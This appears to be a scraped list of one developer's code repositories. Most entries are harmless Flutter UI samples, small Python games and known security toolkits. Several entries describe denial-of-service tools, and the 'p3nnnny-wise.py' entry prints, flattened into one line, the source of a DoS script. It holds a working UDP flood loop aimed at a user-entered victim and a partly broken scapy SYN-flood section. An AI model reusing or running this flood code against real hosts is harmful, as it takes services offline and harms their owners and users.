Gerardo Brallan Zenteno Molina's repositories
Awesome-Python-Scripts
A Curated list of Awesome Python Scripts that Automate Stuffs.
calculator-tkinter
A simple calculator with python3 and tkinter
card_ui_kit
A collection of cards that you can use easily and ready to be used in your Flutter applications.
CarouselOverlappingCards-Flutter
Overlapping cards vertical scrolling with carousel effect
Snake-Game-in-Python
Classic snake game in python3 🐍
DDOS-TOLL
A tool that performs HULK HTTP flood, Ping of Death, UDP flood, SNMP, Smurf ICMP, and Slowloris attacs
flutter-day-1
Flutter challenges - Day 1 - UI for a Wallets
Flutter-InfiniteCards
An infinite card switching UI for Flutter, support custom animation 自定义实现神奇动效的卡片切换视图
ICMP_Smurf_Attack
ICMP Smurf Attack in python
lenguajesdeinternet
hello_world_in_Flutter
MeshCommander
MeshCommander is a Intel(R) Active Management Technology (Intel(R) AMT) remote management tool. It's feature rich and includes a built-in remote desktop viewer for Hardware-KVM, a Serial-over-LAN terminal, IDER-Redirection support and much more. MeshCommander is built on web technologies and runs on many plaforms. In addition to being available as a stand-alone tool, MeshCommander was built to be very space efficient to that it can be uploaded into Intel AMT flash space to have it served diretly from the Intel AMT web serve.
mr_tabs
Flutter Android Swipe Tabs with Cards example tutorial. Find complete tutorial here http://camposha.info/flutter/swipe-tabs-cards
p3nnnny-wise.py
Penny-Wise is a stress testinh hard hiting Denial Of service Script Made in Python here is the script ___ ___ ___ ___ ___ ___ | )|___)| )| )\ ) | )| |___ |___) |__/ |__ | / | / \_/ |/\/ | __/ |__ | / """ ) print ("*" * 60) print (" ̫̣̘̲͓" ) print ("*" * 60, "red") print (""" choose request 1. udp flood (for ppl) 2. synflood (for web sites **2 ONLY WORKS ON KALI LINUX**)""") type = raw_input("penny Wise> ") if type == "1": import socket import os import time import random import sys client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) bytes = random._urandom(1024) victim = raw_input("enter ip or website: ") vport = input(" port: ") duration = input("time(in secs): ") timeout = time.time() + duration sent = 0 print (""" **************************************************** Dos attack starting. Sit back and ejoy the show ****************************************************""") while 1: if time.time() > timeout: break else: pass client.sendto(bytes, (victim, vport)) sent = sent + 1 sys.stdout.write("\r% d packets sent " % sent) sys.stdout.flush() if type == "2": import socket, random, sys, threading from scapy.all import * total = 0 target1 = raw_input("targets site: ") port = input("port: ") class SendHTTP(threading.Thread): global target, port def __init__(self): threading.Thread.__init__(self) def run(self): i = IP() i.dst = target1 t = TCP() t.sport = random.randint(1,65535) t.dport = port f.flags = 's' send(i/t, verbose=0) print (""" ******************************************************** Dos attack starting. Sit back and ejoy the show ******************************************************""") while 1: SendHTTP(POST).start() total = total + 1 sys.stdout.write("\r packets sent %i" % total)
scammingthescammers
short script for scamming the scammers with phishing links, by brute forcing random data that makes sense
SecLists
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
Taskist
Flutter ToDo App with Firebase